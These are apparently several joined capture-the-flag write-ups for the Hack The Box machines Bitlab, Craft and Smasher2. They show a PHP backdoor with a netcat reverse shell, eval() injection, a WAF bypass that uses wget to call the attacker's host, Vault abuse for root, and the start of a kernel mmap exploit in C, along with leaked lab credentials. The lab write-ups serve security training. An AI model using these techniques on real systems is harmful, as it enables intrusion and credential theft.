Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/
Disallow: /*/-/group_members
Disallow: /*/project_members
root@kali:~/Desktop/HTB/boxes/bitlab#
Most of the disallowed entries were paths related to the Gitlab application. I checked /help and found a page called bookmarks.html:
There was an interesting link called Gitlab Login:
Clicking on that link didn’t result in anything, so I checked the source of the page, the href attribute had some javascript code:
<DT><AHREF="javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()"ADD_DATE="1554932142">Gitlab Login</A>
I took that code, edited it a little bit and used the js console to execute it:
After logging in with the credentials (clave : 11des0081x) I found two repositories, Profile and Deployer:
I also checked the snippets and I found an interesting code snippet that had the database credentials which will be useful later:
<?php$db_connection=pg_connect("host=localhost dbname=profiles user=profiles password=profiles");$result=pg_query($db_connection,"SELECT * FROM profiles");
Back to the repositories, I checked Profile and it was pretty empty:
The path /profile was one of the disallowed entries in /robots.txt, I wanted to check if that path was related to the repository, so I checked if the same image (developer.jpg) existed, and it did:
Now we can simply upload a php shell and access it through /profile, I uploaded the php-simple-backdoor:
root@kali:~/Desktop/HTB/boxes/bitlab# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.114] 44340
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@bitlab:/var/www/html/profile$ ^Z
[1]+ Stopped nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/bitlab# stty raw -echo
root@kali:~/Desktop/HTB/boxes/bitlab# nc -lvnp 1337
www-data@bitlab:/var/www/html/profile$ export TERM=screen
www-data@bitlab:/var/www/html/profile$
Database Access –> Clave’s Password –> SSH as Clave –> User Flag
After getting a shell as www-data I wanted to use the credentials I got earlier from the code snippet and see what was in the database, however psql wasn’t installed:
www-data@bitlab:/var/www/html/profile$ psql
bash: psql: command not found
www-data@bitlab:/var/www/html/profile$
I executed the same query from the code snippet which queried everything from the table profiles, and I got clave’s password which I could use to get ssh access:
php>$result=$connection->query("SELECT * FROM profiles");php>$profiles=$result->fetchAll();php>print_r($profiles);Array([0]=>Array([id]=>1[0]=>1[username]=>clave[1]=>clave[password]=>c3NoLXN0cjBuZy1wQHNz==[2]=>c3NoLXN0cjBuZy1wQHNz==))php>
We owned user.
Reversing RemoteConnection.exe –> Root’s Password –> SSH as Root –> Root Flag
In the home directory of clave there was a Windows executable called RemoteConnection.exe:
clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave 4096 Aug 8 14:40 .
drwxr-xr-x 3 root root 4096 Feb 28 2019 ..
lrwxrwxrwx 1 root root 9 Feb 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave 3771 Feb 28 2019 .bashrc
drwx------ 2 clave clave 4096 Aug 8 14:40 .cache
drwx------ 3 clave clave 4096 Aug 8 14:40 .gnupg
-rw-r--r-- 1 clave clave 807 Feb 28 2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave 33 Feb 28 2019 user.txt
clave@bitlab:~$
Then I started looking at the code decompilation with Ghidra. One function that caught my attention was FUN_00401520():
/* WARNING: Could not reconcile some variable overlaps */voidFUN_00401520(void){LPCWSTRpWVar1;undefined4***pppuVar2;LPCWSTRlpParameters;undefined4***pppuVar3;int**in_FS_OFFSET;uintin_stack_ffffff44;undefined4*puVar4;uintuStack132;undefined*local_74;undefined*local_70;wchar_t*local_6c;void*local_68[4];undefined4local_58;uintlocal_54;void*local_4c[4];undefined4local_3c;uintlocal_38;undefined4***local_30[4];intlocal_20;uintlocal_1c;uintlocal_14;int*local_10;undefined*puStack12;undefined4local_8;local_8=0xffffffff;puStack12=&LAB_004028e0;local_10=*in_FS_OFFSET;uStack132=DAT_00404018^(uint)&stack0xfffffffc;*(int***)in_FS_OFFSET=&local_10;local_6c=(wchar_t*)0x4;local_14=uStack132;GetUserNameW((LPWSTR)0x4,(LPDWORD)&local_6c);local_38=0xf;local_3c=0;local_4c[0]=(void*)((uint)local_4c[0]&0xffffff00);FUN_004018f0();local_8=0;FUN_00401260(local_68,local_4c);local_74=&stack0xffffff60;local_8._0_1_=1;FUN_004018f0();local_70=&stack0xffffff44;local_8._0_1_=2;puVar4=(undefined4*)(in_stack_ffffff44&0xffffff00);FUN_00401710(local_68);local_8._0_1_=1;FUN_00401040(puVar4);local_8=CONCAT31(local_8._1_3_,3);lpParameters=(LPCWSTR)FUN_00401e6d();pppuVar3=local_30[0];if(local_1c<0x10){pppuVar3=local_30;}pWVar1=lpParameters;pppuVar2=local_30[0];if(local_1c<0x10){pppuVar2=local_30;}while(pppuVar2!=(undefined4***)(local_20+(int)pppuVar3)){*pWVar1=(short)*(char*)pppuVar2;pWVar1=pWVar1+1;pppuVar2=(undefined4***)((int)pppuVar2+1);}lpParameters[local_20]=L'\0';if(local_6c==L"clave"){ShellExecuteW((HWND)0x0,L"open",L"C:\\Program Files\\PuTTY\\putty.exe",lpParameters,(LPCWSTR)0x0,10);}else{FUN_00401c20((int*)cout_exref);}if(0xf<local_1c){operator_delete(local_30[0]);}local_1c=0xf;local_20=0;local_30[0]=(undefined4***)((uint)local_30[0]&0xffffff00);if(0xf<local_54){operator_delete(local_68[0]);}local_54=0xf;local_58=0;local_68[0]=(void*)((uint)local_68[0]&0xffffff00);if(0xf<local_38){operator_delete(local_4c[0]);}*in_FS_OFFSET=local_10;FUN_00401e78();return;}
It looked like it was checking if the name of the user running the program was clave, then It executed PuTTY with some parameters that I couldn’t see:
I copied the executable to a Windows machine and I tried to run it, however it just kept crashing.
I opened it in immunity debugger to find out what was happening, and I found an access violation:
It happened before reaching the function I’m interested in so I had to fix it. What I did was simply replacing the instructions that caused that access violation with NOPs.
I had to set a breakpoint before the cmp instruction, so I searched for the word “clave” in the referenced text strings and I followed it in the disassembler:
Then I executed the program and whenever I hit an access violation I replaced the instructions with NOPs, it happened twice then I reached my breakpoint:
After reaching the breakpoint I could see the parameters that the program gives to putty.exe in both eax and ebx, It was starting an ssh session as root and I could see the password:
And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.
Hey guys, today Craft retired and here’s my write-up about it. It’s a medium rated Linux box and its ip is 10.10.10.110, I added it to /etc/hosts as craft.htb. Let’s jump right in !
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/craft# nmap -sV -sT -sC -o nmapinitial craft.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-03 13:41 EST
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
| ssh-hostkey:
| 2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
| 256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_ 256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
443/tcp open ssl/http nginx 1.15.8
|_http-server-header: nginx/1.15.8
|_http-title: About
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after: 2020-06-20T02:25:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.97 seconds
root@kali:~/Desktop/HTB/boxes/craft#
We got https on port 443 and ssh on port 22.
Web Enumeration
The home page was kinda empty, Only the about info and nothing else:
The navigation bar had two external links, one of them was to https://api.craft.htb/api/ and the other one was to https://gogs.craft.htb:
So I added both of api.craft.htb and gogs.craft.htb to /etc/hosts then I started checking them. https://api.craft.htb/api:
Here we can see the API endpoints and how to interact with them.
We’re interested in the authentication part for now, there are two endpoints, /auth/check which checks the validity of an authorization token and /auth/login which creates an authorization token provided valid credentials.
We don’t have credentials to authenticate so let’s keep enumerating.
Obviously gogs.craft.htb had gogs running:
The repository of the API source code was publicly accessible so I took a look at the code and the commits.
Dinesh’s commits c414b16057 and 10e3ba4f0a had some interesting stuff. First one had some code additions to /brew/endpoints/brew.py where user’s input is being passed to eval() without filtering:
@@-38,9+38,13@@classBrewCollection(Resource):"""
Creates a new brew entry.
"""--create_brew(request.json)-returnNone,201++# make sure the ABV value is sane.
+ifeval('%s > 1'%request.json['abv']):+return"ABV must be a decimal value less than 1.0",400+else:+create_brew(request.json)+returnNone,201@ns.route('/<int:id>')@api.response(404,'Brew not found.')
I took a look at the API documentation again to find in which request I can send the abv parameter:
As you can see we can send a POST request to /brew and inject our payload in the parameter abv, However we still need an authorization token to be able to interact with /brew, and we don’t have any credentials.
The other commit was a test script which had hardcoded credentials, exactly what we need:
+response=requests.get('https://api.craft.htb/api/auth/login',auth=('dinesh','4aUh0A8PbVJxgd'),verify=False)+json_response=json.loads(response.text)+token=json_response['token']++headers={'X-Craft-API-Token':token,'Content-Type':'application/json'}++# make sure token is valid
+response=requests.get('https://api.craft.htb/api/auth/check',headers=headers,verify=False)+print(response.text)+
I tested the credentials and they were valid:
RCE –> Shell on Docker Container
I wrote a small script to authenticate, grab the token, exploit the vulnerability and spawn a shell. exploit.py:
Turns out that the application was hosted on a docker container and I didn’t get a shell on the actual host.
/opt/app # cd /
/ # ls -la
total 64
drwxr-xr-x 1 root root 4096 Feb 10 2019 .
drwxr-xr-x 1 root root 4096 Feb 10 2019 ..
-rwxr-xr-x 1 root root 0 Feb 10 2019 .dockerenv
drwxr-xr-x 1 root root 4096 Jan 3 17:20 bin
drwxr-xr-x 5 root root 340 Jan 3 14:58 dev
drwxr-xr-x 1 root root 4096 Feb 10 2019 etc
drwxr-xr-x 2 root root 4096 Jan 30 2019 home
drwxr-xr-x 1 root root 4096 Feb 6 2019 lib
drwxr-xr-x 5 root root 4096 Jan 30 2019 media
drwxr-xr-x 2 root root 4096 Jan 30 2019 mnt
drwxr-xr-x 1 root root 4096 Feb 9 2019 opt
dr-xr-xr-x 238 root root 0 Jan 3 14:58 proc
drwx------ 1 root root 4096 Jan 3 15:16 root
drwxr-xr-x 2 root root 4096 Jan 30 2019 run
drwxr-xr-x 2 root root 4096 Jan 30 2019 sbin
drwxr-xr-x 2 root root 4096 Jan 30 2019 srv
dr-xr-xr-x 13 root root 0 Jan 3 14:58 sys
drwxrwxrwt 1 root root 4096 Jan 3 17:26 tmp
drwxr-xr-x 1 root root 4096 Feb 9 2019 usr
drwxr-xr-x 1 root root 4096 Jan 30 2019 var
/ #
Gilfoyle’s Gogs Credentials –> SSH Key –> SSH as Gilfoyle –> User Flag
In /opt/app there was a python script called dbtest.py, It connects to the database and executes a SQL query:
/opt/app# ls -la
total44drwxr-xr-x5rootroot4096Jan317:28.drwxr-xr-x1rootroot4096Feb92019..drwxr-xr-x8rootroot4096Feb82019.git-rw-r--r--1rootroot18Feb72019.gitignore-rw-r--r--1rootroot1585Feb72019app.pydrwxr-xr-x5rootroot4096Feb72019craft_api-rwxr-xr-x1rootroot673Feb82019dbtest.pydrwxr-xr-x2rootroot4096Feb72019tests/opt/app# cat dbtest.py
#!/usr/bin/env python
importpymysqlfromcraft_apiimportsettings# test connection to mysql database
connection=pymysql.connect(host=settings.MYSQL_DATABASE_HOST,user=settings.MYSQL_DATABASE_USER,password=settings.MYSQL_DATABASE_PASSWORD,db=settings.MYSQL_DATABASE_DB,cursorclass=pymysql.cursors.DictCursor)try:withconnection.cursor()ascursor:sql="SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"cursor.execute(sql)result=cursor.fetchone()print(result)finally:connection.close()/opt/app#
I copied the script and changed result = cursor.fetchone() to result = cursor.fetchall() and I changed the query to SHOW TABLES:
#!/usr/bin/env python
importpymysqlfromcraft_apiimportsettings# test connection to mysql database
connection=pymysql.connect(host=settings.MYSQL_DATABASE_HOST,user=settings.MYSQL_DATABASE_USER,password=settings.MYSQL_DATABASE_PASSWORD,db=settings.MYSQL_DATABASE_DB,cursorclass=pymysql.cursors.DictCursor)try:withconnection.cursor()ascursor:sql="SHOW TABLES"cursor.execute(sql)result=cursor.fetchall()print(result)finally:connection.close()
#!/usr/bin/env python
importpymysqlfromcraft_apiimportsettings# test connection to mysql database
connection=pymysql.connect(host=settings.MYSQL_DATABASE_HOST,user=settings.MYSQL_DATABASE_USER,password=settings.MYSQL_DATABASE_PASSWORD,db=settings.MYSQL_DATABASE_DB,cursorclass=pymysql.cursors.DictCursor)try:withconnection.cursor()ascursor:sql="SELECT * FROM user"cursor.execute(sql)result=cursor.fetchall()print(result)finally:connection.close()
The table had all users credentials stored in plain text:
Gilfoyle had a private repository called craft-infra:
He left his private ssh key in the repository:
When I tried to use the key it asked for password as it was encrypted, I tried his gogs password (ZEU3N8WNM2rh4T) and it worked:
We owned user.
Vault –> One-Time SSH Password –> SSH as root –> Root Flag
In Gilfoyle’s home directory there was a file called .vault-token:
gilfoyle@craft:~$ ls -la
total 44
drwx------ 5 gilfoyle gilfoyle 4096 Jan 3 13:42 .
drwxr-xr-x 3 root root 4096 Feb 9 2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle 634 Feb 9 2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4096 Feb 9 2019 .config
drwx------ 2 gilfoyle gilfoyle 4096 Jan 3 13:31 .gnupg
-rw-r--r-- 1 gilfoyle gilfoyle 148 Feb 8 2019 .profile
drwx------ 2 gilfoyle gilfoyle 4096 Feb 9 2019 .ssh
-r-------- 1 gilfoyle gilfoyle 33 Feb 9 2019 user.txt
-rw------- 1 gilfoyle gilfoyle 36 Feb 9 2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 5091 Jan 3 13:28 .viminfo
gilfoyle@craft:~$ cat .vault-token
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle@craft:~$
A quick search revealed that it’s related to vault.
Secure, store and tightly control access to tokens, passwords, certificates, encryption keys for protecting secrets and other sensitive data using a UI, CLI, or HTTP API. -vaultproject.io
By looking at vault.sh from craft-infra repository (vault/vault.sh), we’ll see that it enables the ssh secrets engine then creates an otp role for root:
#!/bin/bash# set up vault secrets backend
vault secrets enable ssh
vault write ssh/roles/root_otp \key_type=otp \default_user=root \cidr_list=0.0.0.0/0
We have the token (.vault-token) so we can easily authenticate to the vault and create an otp for a root ssh session:
gilfoyle@craft:~$ vault login
Token (will be hidden):
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.
Key Value
--- -----
token f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor 1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration ∞
token_renewable false
token_policies ["root"]
identity_policies []
policies ["root"]
gilfoyle@craft:~$ vault write ssh/creds/root_otp ip=127.0.0.1
Key Value
--- -----
lease_id ssh/creds/root_otp/f17d03b6-552a-a90a-02b8-0932aaa20198
lease_duration 768h
lease_renewable false
ip 127.0.0.1
key c495f06b-daac-8a95-b7aa-c55618b037ee
key_type otp
port 22
username root
gilfoyle@craft:~$
And finally we’ll ssh into localhost and use the generated password (c495f06b-daac-8a95-b7aa-c55618b037ee):
gilfoyle@craft:~$ ssh [email protected]
. * .. . * *
* * @()Ooc()* o .
(Q@*0CG*O() ___
|\_________/|/ _ \
| | | | | / | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | \_| |
| | | | |\___/
|\_|__|__|_/|
\_________/
Password:
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~#
And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham Thanks for reading.
Hey guys, today smasher2 retired and here’s my write-up about it. Smasher2 was an interesting box and one of the hardest I have ever solved. Starting with a web application vulnerable to authentication bypass and RCE combined with a WAF bypass, then a kernel module with an insecure mmap handler implementation allowing users to access kernel memory. I enjoyed the box and learned a lot from it. It’s a Linux box and its ip is 10.10.10.135, I added it to /etc/hosts as smasher2.htb. Let’s jump right in!
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/smasher2# nmap -sV -sT -sC -o nmapinitial smasher2.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 07:32 EST
Nmap scan report for smasher2.htb (10.10.10.135)
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 23:a3:55:a8:c6:cc:74:cc:4d:c7:2c:f8:fc:20:4e:5a (RSA)
| 256 16:21:ba:ce:8c:85:62:04:2e:8c:79:fa:0e:ea:9d:33 (ECDSA)
|_ 256 00:97:93:b8:59:b5:0f:79:52:e1:8a:f1:4f:ba:ac:b4 (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.3 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.3-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds
root@kali:~/Desktop/HTB/boxes/smasher2#
We got ssh on port 22, dns on port 53 and http on port 80.
DNS
First thing I did was to enumerate vhosts through the dns server and I got 1 result:
root@kali:~/Desktop/HTB/boxes/smasher2# dig axfr smasher2.htb @10.10.10.135
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> axfr smasher2.htb @10.10.10.135
;; global options: +cmd
smasher2.htb. 604800 IN SOA smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
smasher2.htb. 604800 IN NS smasher2.htb.
smasher2.htb. 604800 IN A 127.0.0.1
smasher2.htb. 604800 IN AAAA ::1
smasher2.htb. 604800 IN PTR wonderfulsessionmanager.smasher2.htb.
smasher2.htb. 604800 IN SOA smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
;; Query time: 299 msec
;; SERVER: 10.10.10.135#53(10.10.10.135)
;; WHEN: Fri Dec 13 07:36:43 EST 2019
;; XFR size: 6 records (messages 1, bytes 242)
root@kali:~/Desktop/HTB/boxes/smasher2#
wonderfulsessionmanager.smasher2.htb, I added it to my hosts file.
Web Enumeration
http://smasher2.htb had the default Apache index page:
http://wonderfulsessionmanager.smasher2.htb:
The only interesting here was the login page:
I kept testing it for a while and the responses were like this one:
It didn’t request any new pages so I suspected that it’s doing an AJAX request, I intercepted the login request to find out the endpoint it was requesting:
The only result that wasn’t 403 was /backup so I checked that and found 2 files:
Note: Months ago when I solved this box for the first time /backup was protected by basic http authentication, that wasn’t the case when I revisited the box for the write-up even after resetting it. I guess it got removed, however it wasn’t an important step, it was just heavy brute force so the box is better without it.
I downloaded the files to my box:
By looking at auth.py I knew that these files were related to wonderfulsessionmanager.smasher2.htb.
auth.py: Analysis
auth.py:
#!/usr/bin/env python
importsesfromflaskimportsession,redirect,url_for,request,render_template,jsonify,Flask,send_from_directoryfromthreadingimportLockimporthashlibimporthmacimportosimportbase64importsubprocessimporttimedefget_secure_key():m=hashlib.sha1()m.update(os.urandom(32))returnm.hexdigest()defcraft_secure_token(content):h=hmac.new("HMACSecureKey123!",base64.b64encode(content).encode(),hashlib.sha256)returnh.hexdigest()lock=Lock()app=Flask(__name__)app.config['SECRET_KEY']=get_secure_key()Managers={}deflog_creds(ip,c):withopen("creds.log","a")ascreds:creds.write("Login from {} with data {}:{}\n".format(ip,c["username"],c["password"]))creds.close()defsafe_get_manager(id):lock.acquire()manager=Managers[id]lock.release()returnmanagerdefsafe_init_manager(id):lock.acquire()ifidinManagers:delManagers[id]else:login=["<REDACTED>","<REDACTED>"]Managers.update({id:ses.SessionManager(login,craft_secure_token(":".join(login)))})lock.release()defsafe_have_manager(id):ret=Falselock.acquire()ret=idinManagerslock.release()returnret@app.before_requestdefbefore_request():ifrequest.path=="/":ifnotsession.has_key("id"):k=get_secure_key()safe_init_manager(k)session["id"]=kelifsession.has_key("id")andnotsafe_have_manager(session["id"]):delsession["id"]returnredirect("/",302)else:ifsession.has_key("id")andsafe_have_manager(session["id"]):passelse:returnredirect("/",302)@app.after_requestdefafter_request(resp):returnresp@app.route('/assets/<path:filename>')defbase_static(filename):returnsend_from_directory(app.root_path+'/assets/',filename)@app.route('/',methods=['GET'])defindex():returnrender_template("index.html")@app.route('/login',methods=['GET'])defview_login():returnrender_template("login.html")@app.route('/auth',methods=['POST'])deflogin():ret={"authenticated":None,"result":None}manager=safe_get_manager(session["id"])data=request.get_json(silent=True)ifdata:try:tmp_login=dict(data["data"])except:passtmp_user_login=Nonetry:is_logged=manager.check_login(data)secret_token_info=["/api/<api_key>/job",manager.secret_key,int(time.time())]try:tmp_user_login={"username":tmp_login["username"],"password":tmp_login["password"]}except:passifnotis_logged[0]:ret["authenticated"]=Falseret["result"]="Cannot authenticate with data: %s - %s"%(is_logged[1],"Too many tentatives, wait 2 minutes!"ifmanager.blockedelse"Try again!")else:iftmp_user_loginisnotNone:log_creds(request.remote_addr,tmp_user_login)ret["authenticated"]=Trueret["result"]={"endpoint":secret_token_info[0],"key":secret_token_info[1],"creation_date":secret_token_info[2]}exceptTypeErrorase:ret["authenticated"]=Falseret["result"]=str(e)else:ret["authenticated"]=Falseret["result"]="Cannot authenticate missing parameters."returnjsonify(ret)@app.route("/api/<key>/job",methods=['POST'])defjob(key):ret={"success":None,"result":None}manager=safe_get_manager(session["id"])ifmanager.secret_key==key:data=request.get_json(silent=True)ifdataandtype(data)==dict:if"schedule"indata:out=subprocess.check_output(['bash','-c',data["schedule"]])ret["success"]=Trueret["result"]=outelse:ret["success"]=Falseret["result"]="Missing schedule parameter."else:ret["success"]=Falseret["result"]="Invalid value provided."else:ret["success"]=Falseret["result"]="Invalid token."returnjsonify(ret)app.run(host='127.0.0.1',port=5000)
I read the code and these are the things that interest us:
After successful authentication the server will respond with a secret key that we can use to access the endpoint /api/<key>/job:
So in theory, since the two function are identical, providing the username as a password should work. Which means that it’s just a matter of finding an existing username and we’ll be able to bypass the authentication.
I tried some common usernames before attempting to use wfuzz, Administrator worked:
WAF Bypass –> RCE –> Shell as dzonerzy –> User Flag
I wrote a small script to execute commands through /api/<key>/job as we saw earlier in auth.py, the script was meant for testing purposes:
However when I tried other commands I got a 403 response indicating that the server was protected by a WAF:
cmd: curl http://10.10.xx.xx
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /api/fe61e023b3c64d75b3965a5dd1a923e392c8baeac4ef870334fcad98e6b264f8/job
on this server.<br />
</p>
<address>Apache/2.4.29 (Ubuntu) Server at wonderfulsessionmanager.smasher2.htb Port 80</address>
</body></html>
cmd:
I could easily bypass it by inserting single quotes in the command:
cmd: 'w'g'e't 'h't't'p':'/'/'1'0'.'1'0'.'x'x'.'x'x'/'t'e's't'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
cmd:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.135 - - [13/Dec/2019 08:18:33] code 404, message File not found
10.10.10.135 - - [13/Dec/2019 08:18:33] "GET /test HTTP/1.1" 404 -
To automate the exploitation process I wrote this small exploit:
I hosted it on a python server and I started a netcat listener on port 1337 then I ran the exploit:
We owned user.
dhid.ko: Enumeration
After getting a shell I copied my public ssh key to /home/dzonerzy/.ssh/authorized_keys and got ssh access.
In the home directory of dzonerzy there was a README containing a message from him saying that we’ll need to think outside the box to root smasher2:
dzonerzy@smasher2:~$ ls -al
total 44
drwxr-xr-x 6 dzonerzy dzonerzy 4096 Feb 17 2019 .
drwxr-xr-x 3 root root 4096 Feb 15 2019 ..
lrwxrwxrwx 1 dzonerzy dzonerzy 9 Feb 15 2019 .bash_history -> /dev/null
-rw-r--r-- 1 dzonerzy dzonerzy 220 Feb 15 2019 .bash_logout
-rw-r--r-- 1 dzonerzy dzonerzy 3799 Feb 16 2019 .bashrc
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15 2019 .cache
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15 2019 .gnupg
drwx------ 5 dzonerzy dzonerzy 4096 Feb 17 2019 .local
-rw-r--r-- 1 dzonerzy dzonerzy 807 Feb 15 2019 .profile
-rw-r--r-- 1 root root 900 Feb 16 2019 README
drwxrwxr-x 4 dzonerzy dzonerzy 4096 Dec 13 12:50 smanager
-rw-r----- 1 root dzonerzy 33 Feb 17 2019 user.txt
dzonerzy@smasher2:~$ cat README
.|'''.| '||
||.. ' .. .. .. .... .... || .. .... ... ..
''|||. || || || '' .|| ||. ' ||' || .|...|| ||' ''
. '|| || || || .|' || . '|.. || || || ||
|'....|' .|| || ||. '|..'|' |'..|' .||. ||. '|...' .||. v2.0
by DZONERZY
Ye you've come this far and I hope you've learned something new, smasher wasn't created
with the intent to be a simple puzzle game... but instead I just wanted to pass my limited
knowledge to you fellow hacker, I know it's not much but this time you'll need more than
skill, you will need to think outside the box to complete smasher 2 , have fun and happy
Hacking!
free(knowledge);
free(knowledge);
* error for object 0xd00000000b400: pointer being freed was not allocated *
dzonerzy@smasher2:~$
After some enumeration, I checked the auth log and saw this line:
I opened the module in ghidra then I started checking the functions:
The function dev_read() had a hint that this is the intended way to root the box:
longdev_read(undefined8param_1,undefined8param_2){intiVar1;__fentry__();iVar1=_copy_to_user(param_2,"This is the right way, please exploit this shit!",0x30);return(ulong)(-(uint)(iVar1==0)&0xf)-0xe;}
One interesting function that caught my attention was dev_mmap():
In case you don’t know what mmap is, simply mmap is a system call which is used to map memory to a file or a device. (Check this)
The function dev_mmap() is a custom mmap handler.
The interesting part here is the call to remap_pfn_range() function (remap kernel memory to userspace):
If we look at the function call again we can see that the 3rd and 4th arguments (physical address of the kernel memory and size of map area) are given to the function without any prior validation:
This means that we can map any size of memory we want and read/write to it, allowing us to even access the kernel memory.
dhid.ko: Exploitation –> Root Shell –> Root Flag
Luckily, this white paper had a similar scenario and explained the exploitation process very well, I recommend reading it after finishing the write-up, I will try to explain the process as good as I can but the paper will be more detailed. In summary, what’s going to happen is that we’ll map a huge amount of memory and search through it for our process’s cred structure (The cred structure holds our process credentials) then overwrite our uid and gid with 0 and execute /bin/sh. Let’s go through it step by step.
First, we need to make sure that it’s really exploitable, we’ll try to map a huge amount of memory and check if it worked:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
intmain(intargc,char*const*argv){printf("[+] PID: %d\n",getpid());intfd=open("/dev/dhid",O_RDWR);if(fd<0){printf("[!] Open failed!\n");return-1;}printf("[*] Open OK fd: %d\n",fd);unsignedlongsize=0xf0000000;unsignedlongmmapStart=0x42424000;unsignedint*addr=(unsignedint*)mmap((void*)mmapStart,size,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0x0);if(addr==MAP_FAILED){perror("[!] Failed to mmap");close(fd);return-1;}printf("[*] mmap OK address: %lx\n",addr);intstop=getchar();return0;}
Now we can start searching for the cred structure that belongs to our process, if we take a look at the how the cred structure looks like:
